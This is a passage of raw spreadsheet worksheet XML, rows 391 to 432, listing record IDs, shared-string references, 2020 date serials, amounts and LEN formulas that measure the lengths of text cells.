        <v>87</v>
      </c>
      <c r="L391">
        <f>LEN(J391)</f>
        <v>50</v>
      </c>
    </row>
    <row r="392" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A392">
        <v>19630</v>
      </c>
      <c r="B392">
        <v>686</v>
      </c>
      <c r="C392" t="s">
        <v>16299</v>
      </c>
      <c r="D392" t="s">
        <v>16300</v>
      </c>
      <c r="E392">
        <v>1</v>
      </c>
      <c r="F392" t="s">
        <v>10142</v>
      </c>
      <c r="G392" s="1">
        <v>43871</v>
      </c>
      <c r="H392" s="4">
        <v>100000</v>
      </c>
      <c r="I392" t="s">
        <v>10143</v>
      </c>
      <c r="J392" t="s">
        <v>10138</v>
      </c>
      <c r="K392">
        <f>LEN(I392)</f>
        <v>85</v>
      </c>
      <c r="L392">
        <f>LEN(J392)</f>
        <v>50</v>
      </c>
    </row>
    <row r="393" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A393">
        <v>19627</v>
      </c>
      <c r="B393">
        <v>686</v>
      </c>
      <c r="C393" t="s">
        <v>16299</v>
      </c>
      <c r="D393" t="s">
        <v>16300</v>
      </c>
      <c r="E393">
        <v>1</v>
      </c>
      <c r="F393" t="s">
        <v>10136</v>
      </c>
      <c r="G393" s="1">
        <v>43871</v>
      </c>
      <c r="H393" s="4">
        <v>100000</v>
      </c>
      <c r="I393" t="s">
        <v>10137</v>
      </c>
      <c r="J393" t="s">
        <v>10138</v>
      </c>
      <c r="K393">
        <f>LEN(I393)</f>
        <v>80</v>
      </c>
      <c r="L393">
        <f>LEN(J393)</f>
        <v>50</v>
      </c>
    </row>
    <row r="394" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A394">
        <v>20836</v>
      </c>
      <c r="B394">
        <v>2097</v>
      </c>
      <c r="C394" t="s">
        <v>6070</v>
      </c>
      <c r="D394" t="s">
        <v>11022</v>
      </c>
      <c r="E394">
        <v>2</v>
      </c>
      <c r="F394" t="s">
        <v>11023</v>
      </c>
      <c r="G394" s="1">
        <v>44061</v>
      </c>
      <c r="H394">
        <v>500000</v>
      </c>
      <c r="I394" t="s">
        <v>9603</v>
      </c>
      <c r="J394" t="s">
        <v>11024</v>
      </c>
      <c r="K394">
        <f>LEN(I394)</f>
        <v>10</v>
      </c>
      <c r="L394">
        <f>LEN(J394)</f>
        <v>50</v>
      </c>
    </row>
    <row r="395" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A395">
        <v>20837</v>
      </c>
      <c r="B395">
        <v>2097</v>
      </c>
      <c r="C395" t="s">
        <v>6070</v>
      </c>
      <c r="D395" t="s">
        <v>11022</v>
      </c>
      <c r="E395">
        <v>2</v>
      </c>
      <c r="F395" t="s">
        <v>11025</v>
      </c>
      <c r="G395" s="1">
        <v>44061</v>
      </c>
      <c r="H395">
        <v>500000</v>
      </c>
      <c r="I395" t="s">
        <v>9603</v>
      </c>
      <c r="J395" t="s">
        <v>11024</v>
      </c>
      <c r="K395">
        <f>LEN(I395)</f>
        <v>10</v>
      </c>
      <c r="L395">
        <f>LEN(J395)</f>
        <v>50</v>
      </c>
    </row>
    <row r="396" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A396">
        <v>20841</v>
      </c>
      <c r="B396">
        <v>2097</v>
      </c>
      <c r="C396" t="s">
        <v>6070</v>
      </c>
      <c r="D396" t="s">
        <v>11022</v>
      </c>
      <c r="E396">
        <v>2</v>
      </c>
      <c r="F396" t="s">
        <v>9642</v>
      </c>
      <c r="G396" s="1">
        <v>44061</v>
      </c>
      <c r="H396">
        <v>500000</v>
      </c>
      <c r="I396" t="s">
        <v>9603</v>
      </c>
      <c r="J396" t="s">
        <v>11024</v>
      </c>
      <c r="K396">
        <f>LEN(I396)</f>
        <v>10</v>
      </c>
      <c r="L396">
        <f>LEN(J396)</f>
        <v>50</v>
      </c>
    </row>
    <row r="397" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A397">
        <v>20842</v>
      </c>
      <c r="B397">
        <v>2097</v>
      </c>
      <c r="C397" t="s">
        <v>6070</v>
      </c>
      <c r="D397" t="s">
        <v>11022</v>
      </c>
      <c r="E397">
        <v>2</v>
      </c>
      <c r="F397" t="s">
        <v>764</v>
      </c>
      <c r="G397" s="1">
        <v>44061</v>
      </c>
      <c r="H397">
        <v>5000</v>
      </c>
      <c r="I397" t="s">
        <v>9603</v>
      </c>
      <c r="J397" t="s">
        <v>11024</v>
      </c>
      <c r="K397">
        <f>LEN(I397)</f>
        <v>10</v>
      </c>
      <c r="L397">
        <f>LEN(J397)</f>
        <v>50</v>
      </c>
    </row>
    <row r="398" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A398">
        <v>21231</v>
      </c>
      <c r="B398">
        <v>2097</v>
      </c>
      <c r="C398" t="s">
        <v>6070</v>
      </c>
      <c r="D398" t="s">
        <v>11022</v>
      </c>
      <c r="E398">
        <v>2</v>
      </c>
      <c r="F398" t="s">
        <v>3814</v>
      </c>
      <c r="G398" s="1">
        <v>44061</v>
      </c>
      <c r="H398">
        <v>500000</v>
      </c>
      <c r="I398" t="s">
        <v>9603</v>
      </c>
      <c r="J398" t="s">
        <v>11024</v>
      </c>
      <c r="K398">
        <f>LEN(I398)</f>
        <v>10</v>
      </c>
      <c r="L398">
        <f>LEN(J398)</f>
        <v>50</v>
      </c>
    </row>
    <row r="399" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A399">
        <v>20101</v>
      </c>
      <c r="B399">
        <v>46</v>
      </c>
      <c r="C399" t="s">
        <v>658</v>
      </c>
      <c r="D399" t="s">
        <v>10470</v>
      </c>
      <c r="E399">
        <v>12</v>
      </c>
      <c r="F399" t="s">
        <v>4686</v>
      </c>
      <c r="G399" s="1">
        <v>43928</v>
      </c>
      <c r="H399">
        <v>1500</v>
      </c>
      <c r="J399" t="s">
        <v>10471</v>
      </c>
      <c r="K399">
        <f>LEN(I399)</f>
        <v>0</v>
      </c>
      <c r="L399">
        <f>LEN(J399)</f>
        <v>50</v>
      </c>
    </row>
    <row r="400" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A400">
        <v>20202</v>
      </c>
      <c r="B400">
        <v>2701</v>
      </c>
      <c r="C400" t="s">
        <v>16301</v>
      </c>
      <c r="D400" t="s">
        <v>16302</v>
      </c>
      <c r="E400">
        <v>12</v>
      </c>
      <c r="F400" t="s">
        <v>10549</v>
      </c>
      <c r="G400" s="1">
        <v>43964</v>
      </c>
      <c r="H400" s="4">
        <v>2400000</v>
      </c>
      <c r="I400" t="s">
        <v>10548</v>
      </c>
      <c r="J400" t="s">
        <v>10550</v>
      </c>
      <c r="K400">
        <f>LEN(I400)</f>
        <v>35</v>
      </c>
      <c r="L400">
        <f>LEN(J400)</f>
        <v>49</v>
      </c>
    </row>
    <row r="401" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A401">
        <v>19255</v>
      </c>
      <c r="B401">
        <v>853</v>
      </c>
      <c r="C401" t="s">
        <v>16303</v>
      </c>
      <c r="D401" t="s">
        <v>16304</v>
      </c>
      <c r="E401">
        <v>13</v>
      </c>
      <c r="F401" t="s">
        <v>9876</v>
      </c>
      <c r="G401" s="1">
        <v>43987</v>
      </c>
      <c r="H401" s="4">
        <v>270000</v>
      </c>
      <c r="J401" t="s">
        <v>9877</v>
      </c>
      <c r="K401">
        <f>LEN(I401)</f>
        <v>0</v>
      </c>
      <c r="L401">
        <f>LEN(J401)</f>
        <v>49</v>
      </c>
    </row>
    <row r="402" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A402">
        <v>19256</v>
      </c>
      <c r="B402">
        <v>853</v>
      </c>
      <c r="C402" t="s">
        <v>16303</v>
      </c>
      <c r="D402" t="s">
        <v>16304</v>
      </c>
      <c r="E402">
        <v>13</v>
      </c>
      <c r="F402" t="s">
        <v>9437</v>
      </c>
      <c r="G402" s="1">
        <v>43987</v>
      </c>
      <c r="H402" s="4">
        <v>24000</v>
      </c>
      <c r="J402" t="s">
        <v>9877</v>
      </c>
      <c r="K402">
        <f>LEN(I402)</f>
        <v>0</v>
      </c>
      <c r="L402">
        <f>LEN(J402)</f>
        <v>49</v>
      </c>
    </row>
    <row r="403" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A403">
        <v>19671</v>
      </c>
      <c r="B403">
        <v>2126</v>
      </c>
      <c r="C403" t="s">
        <v>4772</v>
      </c>
      <c r="D403" t="s">
        <v>10156</v>
      </c>
      <c r="E403">
        <v>1</v>
      </c>
      <c r="F403" t="s">
        <v>9527</v>
      </c>
      <c r="G403" s="1">
        <v>43868</v>
      </c>
      <c r="H403">
        <v>2000</v>
      </c>
      <c r="J403" t="s">
        <v>10167</v>
      </c>
      <c r="K403">
        <f>LEN(I403)</f>
        <v>0</v>
      </c>
      <c r="L403">
        <f>LEN(J403)</f>
        <v>48</v>
      </c>
    </row>
    <row r="404" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A404">
        <v>20022</v>
      </c>
      <c r="B404">
        <v>990</v>
      </c>
      <c r="C404" t="s">
        <v>2847</v>
      </c>
      <c r="D404" t="s">
        <v>10401</v>
      </c>
      <c r="E404">
        <v>9</v>
      </c>
      <c r="F404" t="s">
        <v>9441</v>
      </c>
      <c r="G404" s="1">
        <v>43889</v>
      </c>
      <c r="H404">
        <v>50000</v>
      </c>
      <c r="J404" t="s">
        <v>10403</v>
      </c>
      <c r="K404">
        <f>LEN(I404)</f>
        <v>0</v>
      </c>
      <c r="L404">
        <f>LEN(J404)</f>
        <v>48</v>
      </c>
    </row>
    <row r="405" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A405">
        <v>20152</v>
      </c>
      <c r="B405">
        <v>2615</v>
      </c>
      <c r="C405" t="s">
        <v>5527</v>
      </c>
      <c r="D405" t="s">
        <v>10464</v>
      </c>
      <c r="E405">
        <v>18</v>
      </c>
      <c r="F405" t="s">
        <v>10511</v>
      </c>
      <c r="G405" s="1">
        <v>43937</v>
      </c>
      <c r="H405">
        <v>10000</v>
      </c>
      <c r="I405" t="s">
        <v>10468</v>
      </c>
      <c r="J405" t="s">
        <v>10512</v>
      </c>
      <c r="K405">
        <f>LEN(I405)</f>
        <v>62</v>
      </c>
      <c r="L405">
        <f>LEN(J405)</f>
        <v>47</v>
      </c>
    </row>
    <row r="406" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A406">
        <v>21277</v>
      </c>
      <c r="B406">
        <v>142</v>
      </c>
      <c r="C406" t="s">
        <v>1586</v>
      </c>
      <c r="D406" t="s">
        <v>11261</v>
      </c>
      <c r="E406">
        <v>11</v>
      </c>
      <c r="F406" t="s">
        <v>3462</v>
      </c>
      <c r="G406" s="1">
        <v>44140</v>
      </c>
      <c r="H406">
        <v>400000</v>
      </c>
      <c r="I406" t="s">
        <v>11262</v>
      </c>
      <c r="J406" t="s">
        <v>11263</v>
      </c>
      <c r="K406">
        <f>LEN(I406)</f>
        <v>39</v>
      </c>
      <c r="L406">
        <f>LEN(J406)</f>
        <v>47</v>
      </c>
    </row>
    <row r="407" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A407">
        <v>21278</v>
      </c>
      <c r="B407">
        <v>142</v>
      </c>
      <c r="C407" t="s">
        <v>1586</v>
      </c>
      <c r="D407" t="s">
        <v>11261</v>
      </c>
      <c r="E407">
        <v>11</v>
      </c>
      <c r="F407" t="s">
        <v>3686</v>
      </c>
      <c r="G407" s="1">
        <v>44140</v>
      </c>
      <c r="H407">
        <v>400000</v>
      </c>
      <c r="I407" t="s">
        <v>11262</v>
      </c>
      <c r="J407" t="s">
        <v>11263</v>
      </c>
      <c r="K407">
        <f>LEN(I407)</f>
        <v>39</v>
      </c>
      <c r="L407">
        <f>LEN(J407)</f>
        <v>47</v>
      </c>
    </row>
    <row r="408" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A408">
        <v>20296</v>
      </c>
      <c r="B408">
        <v>2647</v>
      </c>
      <c r="C408" t="s">
        <v>5787</v>
      </c>
      <c r="D408" t="s">
        <v>10611</v>
      </c>
      <c r="E408">
        <v>16</v>
      </c>
      <c r="F408" t="s">
        <v>3204</v>
      </c>
      <c r="G408" s="1">
        <v>43935</v>
      </c>
      <c r="H408">
        <v>1000</v>
      </c>
      <c r="I408" t="s">
        <v>9985</v>
      </c>
      <c r="J408" t="s">
        <v>10512</v>
      </c>
      <c r="K408">
        <f>LEN(I408)</f>
        <v>35</v>
      </c>
      <c r="L408">
        <f>LEN(J408)</f>
        <v>47</v>
      </c>
    </row>
    <row r="409" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A409">
        <v>20294</v>
      </c>
      <c r="B409">
        <v>2647</v>
      </c>
      <c r="C409" t="s">
        <v>5787</v>
      </c>
      <c r="D409" t="s">
        <v>10611</v>
      </c>
      <c r="E409">
        <v>16</v>
      </c>
      <c r="F409" t="s">
        <v>7564</v>
      </c>
      <c r="G409" s="1">
        <v>43935</v>
      </c>
      <c r="H409">
        <v>500</v>
      </c>
      <c r="I409" t="s">
        <v>10442</v>
      </c>
      <c r="J409" t="s">
        <v>10512</v>
      </c>
      <c r="K409">
        <f>LEN(I409)</f>
        <v>20</v>
      </c>
      <c r="L409">
        <f>LEN(J409)</f>
        <v>47</v>
      </c>
    </row>
    <row r="410" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A410">
        <v>20295</v>
      </c>
      <c r="B410">
        <v>2647</v>
      </c>
      <c r="C410" t="s">
        <v>5787</v>
      </c>
      <c r="D410" t="s">
        <v>10611</v>
      </c>
      <c r="E410">
        <v>16</v>
      </c>
      <c r="F410" t="s">
        <v>547</v>
      </c>
      <c r="G410" s="1">
        <v>43935</v>
      </c>
      <c r="H410">
        <v>1000</v>
      </c>
      <c r="I410" t="s">
        <v>10442</v>
      </c>
      <c r="J410" t="s">
        <v>10512</v>
      </c>
      <c r="K410">
        <f>LEN(I410)</f>
        <v>20</v>
      </c>
      <c r="L410">
        <f>LEN(J410)</f>
        <v>47</v>
      </c>
    </row>
    <row r="411" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A411">
        <v>20297</v>
      </c>
      <c r="B411">
        <v>2647</v>
      </c>
      <c r="C411" t="s">
        <v>5787</v>
      </c>
      <c r="D411" t="s">
        <v>10611</v>
      </c>
      <c r="E411">
        <v>16</v>
      </c>
      <c r="F411" t="s">
        <v>9846</v>
      </c>
      <c r="G411" s="1">
        <v>43935</v>
      </c>
      <c r="H411">
        <v>1000</v>
      </c>
      <c r="I411" t="s">
        <v>10442</v>
      </c>
      <c r="J411" t="s">
        <v>10512</v>
      </c>
      <c r="K411">
        <f>LEN(I411)</f>
        <v>20</v>
      </c>
      <c r="L411">
        <f>LEN(J411)</f>
        <v>47</v>
      </c>
    </row>
    <row r="412" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A412">
        <v>20298</v>
      </c>
      <c r="B412">
        <v>2647</v>
      </c>
      <c r="C412" t="s">
        <v>5787</v>
      </c>
      <c r="D412" t="s">
        <v>10611</v>
      </c>
      <c r="E412">
        <v>16</v>
      </c>
      <c r="F412" t="s">
        <v>10458</v>
      </c>
      <c r="G412" s="1">
        <v>43935</v>
      </c>
      <c r="H412">
        <v>1000</v>
      </c>
      <c r="I412" t="s">
        <v>10442</v>
      </c>
      <c r="J412" t="s">
        <v>10512</v>
      </c>
      <c r="K412">
        <f>LEN(I412)</f>
        <v>20</v>
      </c>
      <c r="L412">
        <f>LEN(J412)</f>
        <v>47</v>
      </c>
    </row>
    <row r="413" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A413">
        <v>20299</v>
      </c>
      <c r="B413">
        <v>2647</v>
      </c>
      <c r="C413" t="s">
        <v>5787</v>
      </c>
      <c r="D413" t="s">
        <v>10611</v>
      </c>
      <c r="E413">
        <v>16</v>
      </c>
      <c r="F413" t="s">
        <v>10071</v>
      </c>
      <c r="G413" s="1">
        <v>43935</v>
      </c>
      <c r="H413">
        <v>1000</v>
      </c>
      <c r="I413" t="s">
        <v>10442</v>
      </c>
      <c r="J413" t="s">
        <v>10512</v>
      </c>
      <c r="K413">
        <f>LEN(I413)</f>
        <v>20</v>
      </c>
      <c r="L413">
        <f>LEN(J413)</f>
        <v>47</v>
      </c>
    </row>
    <row r="414" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A414">
        <v>20300</v>
      </c>
      <c r="B414">
        <v>2647</v>
      </c>
      <c r="C414" t="s">
        <v>5787</v>
      </c>
      <c r="D414" t="s">
        <v>10611</v>
      </c>
      <c r="E414">
        <v>16</v>
      </c>
      <c r="F414" t="s">
        <v>10612</v>
      </c>
      <c r="G414" s="1">
        <v>43935</v>
      </c>
      <c r="H414">
        <v>1000</v>
      </c>
      <c r="I414" t="s">
        <v>10442</v>
      </c>
      <c r="J414" t="s">
        <v>10512</v>
      </c>
      <c r="K414">
        <f>LEN(I414)</f>
        <v>20</v>
      </c>
      <c r="L414">
        <f>LEN(J414)</f>
        <v>47</v>
      </c>
    </row>
    <row r="415" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A415">
        <v>20196</v>
      </c>
      <c r="B415">
        <v>237</v>
      </c>
      <c r="C415" t="s">
        <v>798</v>
      </c>
      <c r="D415" t="s">
        <v>10537</v>
      </c>
      <c r="E415">
        <v>16</v>
      </c>
      <c r="F415" t="s">
        <v>9437</v>
      </c>
      <c r="G415" s="1">
        <v>43921</v>
      </c>
      <c r="H415">
        <v>50000</v>
      </c>
      <c r="J415" t="s">
        <v>10542</v>
      </c>
      <c r="K415">
        <f>LEN(I415)</f>
        <v>0</v>
      </c>
      <c r="L415">
        <f>LEN(J415)</f>
        <v>47</v>
      </c>
    </row>
    <row r="416" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A416">
        <v>19303</v>
      </c>
      <c r="B416">
        <v>2353</v>
      </c>
      <c r="C416" t="s">
        <v>4876</v>
      </c>
      <c r="D416" t="s">
        <v>9906</v>
      </c>
      <c r="E416">
        <v>34</v>
      </c>
      <c r="F416" t="s">
        <v>9910</v>
      </c>
      <c r="G416" s="1">
        <v>43859</v>
      </c>
      <c r="H416">
        <v>200000</v>
      </c>
      <c r="I416" t="s">
        <v>9693</v>
      </c>
      <c r="J416" t="s">
        <v>9911</v>
      </c>
      <c r="K416">
        <f>LEN(I416)</f>
        <v>33</v>
      </c>
      <c r="L416">
        <f>LEN(J416)</f>
        <v>46</v>
      </c>
    </row>
    <row r="417" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A417">
        <v>20362</v>
      </c>
      <c r="B417">
        <v>509</v>
      </c>
      <c r="C417" t="s">
        <v>932</v>
      </c>
      <c r="D417" t="s">
        <v>10653</v>
      </c>
      <c r="E417">
        <v>26</v>
      </c>
      <c r="F417" t="s">
        <v>2236</v>
      </c>
      <c r="G417" s="1">
        <v>43906</v>
      </c>
      <c r="H417">
        <v>30000</v>
      </c>
      <c r="I417" t="s">
        <v>9693</v>
      </c>
      <c r="J417" t="s">
        <v>10657</v>
      </c>
      <c r="K417">
        <f>LEN(I417)</f>
        <v>33</v>
      </c>
      <c r="L417">
        <f>LEN(J417)</f>
        <v>46</v>
      </c>
    </row>
    <row r="418" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A418">
        <v>20364</v>
      </c>
      <c r="B418">
        <v>509</v>
      </c>
      <c r="C418" t="s">
        <v>932</v>
      </c>
      <c r="D418" t="s">
        <v>10653</v>
      </c>
      <c r="E418">
        <v>26</v>
      </c>
      <c r="F418" t="s">
        <v>4686</v>
      </c>
      <c r="G418" s="1">
        <v>43906</v>
      </c>
      <c r="H418">
        <v>15000</v>
      </c>
      <c r="I418" t="s">
        <v>9693</v>
      </c>
      <c r="J418" t="s">
        <v>10657</v>
      </c>
      <c r="K418">
        <f>LEN(I418)</f>
        <v>33</v>
      </c>
      <c r="L418">
        <f>LEN(J418)</f>
        <v>46</v>
      </c>
    </row>
    <row r="419" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A419">
        <v>20130</v>
      </c>
      <c r="B419">
        <v>2610</v>
      </c>
      <c r="C419" t="s">
        <v>5637</v>
      </c>
      <c r="D419" t="s">
        <v>10495</v>
      </c>
      <c r="E419">
        <v>2</v>
      </c>
      <c r="F419" t="s">
        <v>10496</v>
      </c>
      <c r="G419" s="1">
        <v>43914</v>
      </c>
      <c r="H419">
        <v>500</v>
      </c>
      <c r="J419" t="s">
        <v>10497</v>
      </c>
      <c r="K419">
        <f>LEN(I419)</f>
        <v>0</v>
      </c>
      <c r="L419">
        <f>LEN(J419)</f>
        <v>46</v>
      </c>
    </row>
    <row r="420" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A420">
        <v>20133</v>
      </c>
      <c r="B420">
        <v>2610</v>
      </c>
      <c r="C420" t="s">
        <v>5637</v>
      </c>
      <c r="D420" t="s">
        <v>10495</v>
      </c>
      <c r="E420">
        <v>2</v>
      </c>
      <c r="F420" t="s">
        <v>7211</v>
      </c>
      <c r="G420" s="1">
        <v>43914</v>
      </c>
      <c r="H420">
        <v>200000</v>
      </c>
      <c r="J420" t="s">
        <v>10497</v>
      </c>
      <c r="K420">
        <f>LEN(I420)</f>
        <v>0</v>
      </c>
      <c r="L420">
        <f>LEN(J420)</f>
        <v>46</v>
      </c>
    </row>
    <row r="421" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A421">
        <v>20134</v>
      </c>
      <c r="B421">
        <v>2610</v>
      </c>
      <c r="C421" t="s">
        <v>5637</v>
      </c>
      <c r="D421" t="s">
        <v>10495</v>
      </c>
      <c r="E421">
        <v>2</v>
      </c>
      <c r="F421" t="s">
        <v>5434</v>
      </c>
      <c r="G421" s="1">
        <v>43914</v>
      </c>
      <c r="H421">
        <v>50000</v>
      </c>
      <c r="J421" t="s">
        <v>10497</v>
      </c>
      <c r="K421">
        <f>LEN(I421)</f>
        <v>0</v>
      </c>
      <c r="L421">
        <f>LEN(J421)</f>
        <v>46</v>
      </c>
    </row>
    <row r="422" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A422">
        <v>20135</v>
      </c>
      <c r="B422">
        <v>2610</v>
      </c>
      <c r="C422" t="s">
        <v>5637</v>
      </c>
      <c r="D422" t="s">
        <v>10495</v>
      </c>
      <c r="E422">
        <v>2</v>
      </c>
      <c r="F422" t="s">
        <v>9217</v>
      </c>
      <c r="G422" s="1">
        <v>43914</v>
      </c>
      <c r="H422">
        <v>5000</v>
      </c>
      <c r="J422" t="s">
        <v>10497</v>
      </c>
      <c r="K422">
        <f>LEN(I422)</f>
        <v>0</v>
      </c>
      <c r="L422">
        <f>LEN(J422)</f>
        <v>46</v>
      </c>
    </row>
    <row r="423" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A423">
        <v>20136</v>
      </c>
      <c r="B423">
        <v>2610</v>
      </c>
      <c r="C423" t="s">
        <v>5637</v>
      </c>
      <c r="D423" t="s">
        <v>10495</v>
      </c>
      <c r="E423">
        <v>2</v>
      </c>
      <c r="F423" t="s">
        <v>10387</v>
      </c>
      <c r="G423" s="1">
        <v>43914</v>
      </c>
      <c r="H423">
        <v>20000</v>
      </c>
      <c r="J423" t="s">
        <v>10497</v>
      </c>
      <c r="K423">
        <f>LEN(I423)</f>
        <v>0</v>
      </c>
      <c r="L423">
        <f>LEN(J423)</f>
        <v>46</v>
      </c>
    </row>
    <row r="424" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A424">
        <v>20137</v>
      </c>
      <c r="B424">
        <v>2610</v>
      </c>
      <c r="C424" t="s">
        <v>5637</v>
      </c>
      <c r="D424" t="s">
        <v>10495</v>
      </c>
      <c r="E424">
        <v>2</v>
      </c>
      <c r="F424" t="s">
        <v>7613</v>
      </c>
      <c r="G424" s="1">
        <v>43914</v>
      </c>
      <c r="H424">
        <v>20000</v>
      </c>
      <c r="J424" t="s">
        <v>10497</v>
      </c>
      <c r="K424">
        <f>LEN(I424)</f>
        <v>0</v>
      </c>
      <c r="L424">
        <f>LEN(J424)</f>
        <v>46</v>
      </c>
    </row>
    <row r="425" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A425">
        <v>21198</v>
      </c>
      <c r="B425">
        <v>4773</v>
      </c>
      <c r="C425" t="s">
        <v>7128</v>
      </c>
      <c r="D425" t="s">
        <v>11206</v>
      </c>
      <c r="E425">
        <v>13</v>
      </c>
      <c r="F425" t="s">
        <v>9640</v>
      </c>
      <c r="G425" s="1">
        <v>44053</v>
      </c>
      <c r="H425">
        <v>90000</v>
      </c>
      <c r="J425" t="s">
        <v>11207</v>
      </c>
      <c r="K425">
        <f>LEN(I425)</f>
        <v>0</v>
      </c>
      <c r="L425">
        <f>LEN(J425)</f>
        <v>46</v>
      </c>
    </row>
    <row r="426" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A426">
        <v>21230</v>
      </c>
      <c r="B426">
        <v>4773</v>
      </c>
      <c r="C426" t="s">
        <v>7128</v>
      </c>
      <c r="D426" t="s">
        <v>11206</v>
      </c>
      <c r="E426">
        <v>13</v>
      </c>
      <c r="F426" t="s">
        <v>11225</v>
      </c>
      <c r="G426" s="1">
        <v>44053</v>
      </c>
      <c r="H426">
        <v>90000</v>
      </c>
      <c r="J426" t="s">
        <v>11207</v>
      </c>
      <c r="K426">
        <f>LEN(I426)</f>
        <v>0</v>
      </c>
      <c r="L426">
        <f>LEN(J426)</f>
        <v>46</v>
      </c>
    </row>
    <row r="427" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A427">
        <v>19722</v>
      </c>
      <c r="B427">
        <v>737</v>
      </c>
      <c r="C427" t="s">
        <v>87</v>
      </c>
      <c r="D427" t="s">
        <v>10201</v>
      </c>
      <c r="E427">
        <v>17</v>
      </c>
      <c r="F427" t="s">
        <v>10202</v>
      </c>
      <c r="G427" s="1">
        <v>43971</v>
      </c>
      <c r="H427">
        <v>27493.4</v>
      </c>
      <c r="I427" t="s">
        <v>10203</v>
      </c>
      <c r="J427" t="s">
        <v>10204</v>
      </c>
      <c r="K427">
        <f>LEN(I427)</f>
        <v>67</v>
      </c>
      <c r="L427">
        <f>LEN(J427)</f>
        <v>45</v>
      </c>
    </row>
    <row r="428" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A428">
        <v>19732</v>
      </c>
      <c r="B428">
        <v>737</v>
      </c>
      <c r="C428" t="s">
        <v>87</v>
      </c>
      <c r="D428" t="s">
        <v>10201</v>
      </c>
      <c r="E428">
        <v>17</v>
      </c>
      <c r="F428" t="s">
        <v>10208</v>
      </c>
      <c r="G428" s="1">
        <v>43971</v>
      </c>
      <c r="H428">
        <v>51298.94</v>
      </c>
      <c r="I428" t="s">
        <v>10209</v>
      </c>
      <c r="J428" t="s">
        <v>10204</v>
      </c>
      <c r="K428">
        <f>LEN(I428)</f>
        <v>62</v>
      </c>
      <c r="L428">
        <f>LEN(J428)</f>
        <v>45</v>
      </c>
    </row>
    <row r="429" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A429">
        <v>20641</v>
      </c>
      <c r="B429">
        <v>520</v>
      </c>
      <c r="C429" t="s">
        <v>1123</v>
      </c>
      <c r="D429" t="s">
        <v>10863</v>
      </c>
      <c r="E429">
        <v>16</v>
      </c>
      <c r="F429" t="s">
        <v>1746</v>
      </c>
      <c r="G429" s="1">
        <v>43980</v>
      </c>
      <c r="H429">
        <v>50000</v>
      </c>
      <c r="I429" t="s">
        <v>10873</v>
      </c>
      <c r="J429" t="s">
        <v>10328</v>
      </c>
      <c r="K429">
        <f>LEN(I429)</f>
        <v>41</v>
      </c>
      <c r="L429">
        <f>LEN(J429)</f>
        <v>45</v>
      </c>
    </row>
    <row r="430" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A430">
        <v>20360</v>
      </c>
      <c r="B430">
        <v>509</v>
      </c>
      <c r="C430" t="s">
        <v>932</v>
      </c>
      <c r="D430" t="s">
        <v>10653</v>
      </c>
      <c r="E430">
        <v>26</v>
      </c>
      <c r="F430" t="s">
        <v>10654</v>
      </c>
      <c r="G430" s="1">
        <v>43906</v>
      </c>
      <c r="H430">
        <v>45000</v>
      </c>
      <c r="I430" t="s">
        <v>9693</v>
      </c>
      <c r="J430" t="s">
        <v>10655</v>
      </c>
      <c r="K430">
        <f>LEN(I430)</f>
        <v>33</v>
      </c>
      <c r="L430">
        <f>LEN(J430)</f>
        <v>45</v>
      </c>
    </row>
    <row r="431" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A431">
        <v>20361</v>
      </c>
      <c r="B431">
        <v>509</v>
      </c>
      <c r="C431" t="s">
        <v>932</v>
      </c>
      <c r="D431" t="s">
        <v>10653</v>
      </c>
      <c r="E431">
        <v>26</v>
      </c>
      <c r="F431" t="s">
        <v>10656</v>
      </c>
      <c r="G431" s="1">
        <v>43906</v>
      </c>
      <c r="H431">
        <v>30000</v>
      </c>
      <c r="I431" t="s">
        <v>9693</v>
      </c>
      <c r="J431" t="s">
        <v>10655</v>
      </c>
      <c r="K431">
        <f>LEN(I431)</f>
        <v>33</v>
      </c>
      <c r="L431">
        <f>LEN(J431)</f>
        <v>45</v>
      </c>
    </row>
    <row r="432" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A432">
        <v>20367</v>
      </c>
      <c r="B432">
        <v>509</v>
      </c>
      <c r="C432" t="s">
        <v>932</v>
      </c>
      <c r="D432" t="s">
        <v>10653</v>
      </c>
      <c r="E432">
        <v>26</v>
      </c>
      <c r="F432" t="s">
        <v>10659</v>
      </c>
      <c r="G432" s="1">
        <v>43906</v>
      </c>
      <c r="H432">
        <v>15000</v>
      </c>
      <c r="I432" t="s">
        <v>9693</v>
      </c>
      <c r="J432" t="s">
        <v>10655</v>
      </c>
      <c r="K432">
        <f>LEN(I432)</f>
        <v>33</v>
      </c>
      <c r="L432">
        <f>LEN(J432)</f>
        <v>45</v>
      </c>
    </row>
